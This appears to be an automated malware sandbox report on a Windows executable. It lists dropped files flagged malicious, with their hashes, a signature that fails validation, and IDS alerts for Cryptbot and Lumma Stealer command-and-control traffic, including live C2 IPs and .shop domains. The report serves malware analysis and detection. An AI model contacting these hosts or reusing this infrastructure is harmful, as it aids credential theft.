                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:tWLvun+3wdpugco/89ClzK0UPI7Txi9jv19DkRHzM2HOlomD:ALWn+gdpugcok9C9OPI7gGzM+N
                                                                                                                                                                                                                              MD5:4EE5CFB68E56A5BA61248AE92C60E8C0
                                                                                                                                                                                                                              SHA1:50F064A2CB91284130F99637D2756AC07AF85B01
                                                                                                                                                                                                                              SHA-256:E3698280FF0C7769C1CDACF302688735CF4AB632989E1312D2A45747E79F5DF2
                                                                                                                                                                                                                              SHA-512:B173C595A8F7D66000AE5BF88ABC7D411A5AF01C5AC2EF73A162199F2F77404654A7F08A9E3E2F3319F5002459CBCB953311641AF525F627E077EBEB7240DC4F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{e..............b.......o.......o.......o.......o......fo.......q..........k...fo......fo......fo......Rich............PE..d... ..d.........." .........r...... .....................................................`............................................d...T........`..\.... ..h:...........p.......L..T............................M..8............................................text............................... ..`.rdata..............................@..@.data...p?.......:..................@....pdata..h:... ...<..................@..@.rsrc...\....`.......D..............@..@.reloc.......p.......H..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34816
                                                                                                                                                                                                                              Entropy (8bit):5.607776737873708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:qTtWWcU+d47NgCuVuA7dBm7BZ1CHrWBGwm3ReuuR+F1igomqhPGZGQvD3+VC5pEa:qM47+YedBm0WBgIuuGigahAF7+m2Ca
                                                                                                                                                                                                                              MD5:1580EE4142FB1F90F00B9F5A3CA297EB
                                                                                                                                                                                                                              SHA1:BC730100B6E8C85F709BCFB4FD7A81FB91ABF7D1
                                                                                                                                                                                                                              SHA-256:BD3F16AFB19AF91B016AB3E9669CD845F70F7A4B7A2489A81F312F060B1FB020
                                                                                                                                                                                                                              SHA-512:692C4A0595B715B14A53B41DD192AFB3058A85530975C0CAC673F3D70A2AA31FA66762FC7F453739B35971559F33E6CB20C62FC13C79796E43FF14A8728A26A1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d.wKd.wKd.wKm..Kb.wK6.vJ`.wKp.vJf.wK6.rJh.wK6.sJl.wK6.tJg.wK..vJa.wKd.vK<.wK..~Je.wK..wJe.wK..uJe.wKRichd.wK........PE..d......d.........." .....D...@.......@....................................................`.........................................@...P...............\............................p..T............................p..8............`...............................text....C.......D.................. ..`.rdata..X,...`.......H..............@..@.data...x............v..............@....pdata...............z..............@..@.rsrc...\...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):146712
                                                                                                                                                                                                                              Entropy (8bit):6.609302620823316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:7qLKjJj3yg1shVjm4OvfqnKAh2mrohmR5JHDbuNy:7qGEgSefI3roCDbV
                                                                                                                                                                                                                              MD5:4FADEDA3C1DA95337B67D15C282D49D8
                                                                                                                                                                                                                              SHA1:F49EE3256F8F5746515194114F7EF73D6B6141C0
                                                                                                                                                                                                                              SHA-256:28484BCEA1E387C4A41564AF8F62C040FE203FE2491E415CE90F3D7F5C7AB013
                                                                                                                                                                                                                              SHA-512:45634CAF9D9214F0E45E11A1539D8663B45527E1AE9282558B5FDB8465D90B0FABCF4C0E508504427A597BA390C029BC12068AC17D842FD0FCBB1886D252C6B1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x.Oc..........."...'............P..........A.....................................W....`... ......................................@.......P..8......................../......................................(....................Q..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata....... ......................@..@.bss.........0...........................edata.......@......................@..@.idata..8....P......................@....CRT....X....`......................@....tls.........p......................@....rsrc...............................@....reloc..............................@..B................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):315835392
                                                                                                                                                                                                                              Entropy (8bit):0.05575371358044388
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:cAioqkTyRAu5maHO49jez+Q1AepiO0gxNMp7POR:cAi1u49jehRi9D
                                                                                                                                                                                                                              MD5:1DFC049856D4E34AC71CEA9A0CCA8F5B
                                                                                                                                                                                                                              SHA1:143852762ABC816BEC539990826472A9659FA063
                                                                                                                                                                                                                              SHA-256:171109E08DC4B3AE8454868B2D1314BFBA111BBA222646D1B9366E2DBC8D50DD
                                                                                                                                                                                                                              SHA-512:0A7BEC053E786E145FDCC4C4685849EB31C5E9944237B6B8483346A7ADD3B80EC9EC56DB937CD228D18BF234F6BF958CE8886A5462DD9B2D40AEEB4472370153
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.f...........#...#.H...@...............`.....m.................................O....@... .........................`....................................0..........................................................t............................text...LF.......H..................`.P`.data........`.......L..............@.`..rdata..@............b..............@.`@.eh_fram.....P.......&..............@.0@.bss....t.............................`..edata..`...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls......... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):314613760
                                                                                                                                                                                                                              Entropy (8bit):0.002153573128084165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:6661EFE43707F9C14239C4E43959C8F4
                                                                                                                                                                                                                              SHA1:2581C9FE54534B9E4337818192B4153DC186225B
                                                                                                                                                                                                                              SHA-256:8299900778DC7F49AF1FDD1C0C44A20690D0162E92F6EA8CBA70F908C2171811
                                                                                                                                                                                                                              SHA-512:4DF7172A23C3BF77E1011CDD0D04EC69C1D3556831EF8D97D82ED197C12ED60277B6736F890A1F7E84C11CE8C11F203A9B75141F9382D29C9DABDE4DB3015EC2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../.f...............#.v........................@.................................M,....@... .................................................................h...................................................X................................text....u.......v..................`.P`.data...X............z..............@.0..rdata..X............|..............@.`@.eh_fram............................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..h...........................@.0B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33225728
                                                                                                                                                                                                                              Entropy (8bit):6.186417299552574
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:B8A15F36239AC6A968A373BF93D06CE6
                                                                                                                                                                                                                              SHA1:BEABB3DA9B91DCBE608DD85D28D9BB69C744E3C0
                                                                                                                                                                                                                              SHA-256:FD6269BA61258F30291430D11AB1F0A6CF13E23D0FB9E6850212D6A1E4EAD7CA
                                                                                                                                                                                                                              SHA-512:CEF10F7B3FCB9EB980C020FB55AF18A1162084F7E9147F279FDBB64E179C1874C9DBEDBB4AC76046B023B03235EBB0EA6BD12A008F69673AB89A1E7F0448FE89
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................................`u............@..........................@............@.....................................L.......6$.......................;...................................................................................text............................... ..`.rdata..\...........................@..@.data...L...........................@....idata..L...........................@....reloc...;.......<..................@..B.symtab................................B.rsrc...6$.......&..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6655499
                                                                                                                                                                                                                              Entropy (8bit):6.634213974500711
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:950CFC590026C689357A2DB4C9DE3FA6
                                                                                                                                                                                                                              SHA1:7FB0B7FD533B622C48CD02D056493AAC1E93ACBD
                                                                                                                                                                                                                              SHA-256:0C27861F03C8D88D8AD32B06A63F329A9AD895312ABB6878600AEB9CE745B67A
                                                                                                                                                                                                                              SHA-512:9DEAC7312325799AFD83A9DF287B370E0DC917CEDEAC451C9D558A28E66E4C2B0AA7280D1728A295619D19B66C40B33DA58A79EE0D04B5F59FF868D951964824
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.f.,_..%.........#..G..~Z...f...........H...@.................................e.e....... ......................`..B....p...................................(..........................4.H......................q...............................text...t.G.......G.................`.P`.data.........H.......G.............@.`..rdata..X.... H.......H.............@.`@/4............H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......JL.............@.0@.idata.......p.......LL.............@.0..CRT....4............VL.............@.0..tls.................XL.............@.0..reloc...(.......*...ZL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...4\.............@..B/55.....B.............\.............@..B/67.....T............f].............@.0B/80.....a.............].
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27424048
                                                                                                                                                                                                                              Entropy (8bit):7.9964497109171155
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              SHA1:D821C9F01FCB20DCEEAD90F85A2B7D5D126911E7
                                                                                                                                                                                                                              SHA-256:4465C73BA9FB8EC1B7D17678B81CDE013AF6CD95BBA661FFAF02CE77DEDCEB9F
                                                                                                                                                                                                                              SHA-512:FBCABADD010032A3E10630119D58C2FAA53709ACBECBD8DB8F7930AF503812FBFB7E88CC3C669F827B7DE086B20018ADB43A06760A22BBF18868B9B563D3CE6E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d....q.f.........."....(.......................@..........................................`.................................................\...x....p...'...@..P"..............d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc....'...p...(..................@..@.reloc..d............*..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                              Entropy (8bit):4.372248048955413
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:66E3C4B70DCD333F2936A1888A557312
                                                                                                                                                                                                                              SHA1:ED599BCCF362F24D2EA99140B353E911F757846B
                                                                                                                                                                                                                              SHA-256:C44BF3822408C7B66912A375D1D412DB8CCD6BF125C5F82F6B92B25EB1B9DAE7
                                                                                                                                                                                                                              SHA-512:0A4E68DC0093095C3FDCADAF6E016A97F15A0ED4E8592584BA920E814D9E78EA9318A9D1DCA9E427D71ACC61A0695E3DFDE5BE15099006E3FA84A31FBF6E4F16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..bu................................................................................................................................................................................................................................................................................................................................................&.uA........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):6.071780837254419
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                              File size:5'022'848 bytes
                                                                                                                                                                                                                              MD5:334014ba9b86b1e9c387a2fbd3b32053
                                                                                                                                                                                                                              SHA1:8fa39699d6621aadeb1b02f8316aabb40856eef3
                                                                                                                                                                                                                              SHA256:c22d408c5bc0891b7d3dc87baafcae710314bd7ef59a06960ea0d6da31f0e657
                                                                                                                                                                                                                              SHA512:2ed5e87f6dce7695bf2cae5d1144897ed0bfd350d111f74d6c97041d40ebacc86a177f1f63713d71869ac58e0b5852d5cf9eb81d981967157c68006b03a9f5b5
                                                                                                                                                                                                                              SSDEEP:49152:+J0jpenThmzB8odN5ruqMCkLVW7F0x6sJP7RniP8NDNqfHV:7GhOBHtCb6sJNm2D81
                                                                                                                                                                                                                              TLSH:74362302B15B5C13FE481574C4E836F612FCBE4B32F415AFCF8A0E29A4549BD92796B2
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..f.........."...0..:............... ....@...... ...............................EM...`................................
                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                              Entrypoint:0x400000
                                                                                                                                                                                                                              Entrypoint Section:
                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x66F2A468 [Tue Sep 24 11:37:12 2024 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:
                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                              Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                              Error Number:-2146762487
                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                              • 24/09/2024 15:16:35 24/09/2025 15:16:35
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                              • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                              Thumbprint MD5:A8670BA29EE7A08639A2E2936C463A37
                                                                                                                                                                                                                              Thumbprint SHA-1:BD43EA934BC6B822789EC32F22B4A1F2266AA32F
                                                                                                                                                                                                                              Thumbprint SHA-256:500D1D1CAE8F886EDD31A2BFE44BB07E7EF2E689821F96431F5F6899E197DF5C
                                                                                                                                                                                                                              Serial:17E645AE94EDA5BF957F18D72DB9BAA5
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              dec ebp
                                                                                                                                                                                                                              pop edx
                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                              add byte ptr [ebx], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax+eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x5ea.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x4c86200x1e60
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              .text0x20000x3a980x3c007d7776b913e9f712b4121236d08de0c1False0.6410807291666667data6.221522614481432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rsrc0x60000x5ea0x60057d280fb4b749a5ff5990ae311254c9eFalse0.4212239583333333data4.1460215092223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                              RT_VERSION0x60a00x360data0.41087962962962965
                                                                                                                                                                                                                              RT_MANIFEST0x64000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                              2024-09-24T15:34:12.227487+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497485.53.124.19580TCP
                                                                                                                                                                                                                              2024-09-24T15:34:12.227487+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497475.53.124.19580TCP
                                                                                                                                                                                                                              2024-09-24T15:34:12.227487+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497635.53.124.19580TCP
                                                                                                                                                                                                                              2024-09-24T15:34:12.227487+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497505.53.124.19580TCP
                                                                                                                                                                                                                              2024-09-24T15:34:29.795856+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849734103.130.147.21180TCP
                                                                                                                                                                                                                              2024-09-24T15:34:29.824438+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849735103.130.147.21180TCP
                                                                                                                                                                                                                              2024-09-24T15:34:29.963085+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849734103.130.147.21180TCP
                                                                                                                                                                                                                              2024-09-24T15:34:34.879491+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849734103.130.147.21180TCP
                                                                                                                                                                                                                              2024-09-24T15:34:34.879491+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849734103.130.147.21180TCP
                                                                                                                                                                                                                              2024-09-24T15:35:12.518442+02002055881ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (keennylrwmqlw .shop)1192.168.2.8575501.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.532393+02002055883ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licenseodqwmqn .shop)1192.168.2.8608421.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.543025+02002055891ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencctywop .shop)1192.168.2.8607501.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.575146+02002055893ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tesecuuweqo .shop)1192.168.2.8590151.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.645852+02002055887ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relaxatinownio .shop)1192.168.2.8552151.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.680044+02002055885ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reggwardssdqw .shop)1192.168.2.8633741.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.691545+02002055879ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)1192.168.2.8550391.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:12.705862+02002055895ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tryyudjasudqo .shop)1192.168.2.8558681.1.1.153UDP
                                                                                                                                                                                                                              2024-09-24T15:35:13.926693+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497585.53.124.19580TCP
                                                                                                                                                                                                                              2024-09-24T15:35:18.833958+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497625.53.124.19580TCP
                                                                                                                                                                                                                              2024-09-24T15:35:25.072889+02002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.8497685.53.124.19580TCP
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.100379944 CEST4971180192.168.2.845.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.105444908 CEST804971145.91.200.135192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.105537891 CEST4971180192.168.2.845.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.105704069 CEST4971180192.168.2.845.91.200.135
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.110671997 CEST804971145.91.200.135192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:20.703751087 CEST804971145.91.200.135192.168.2.8
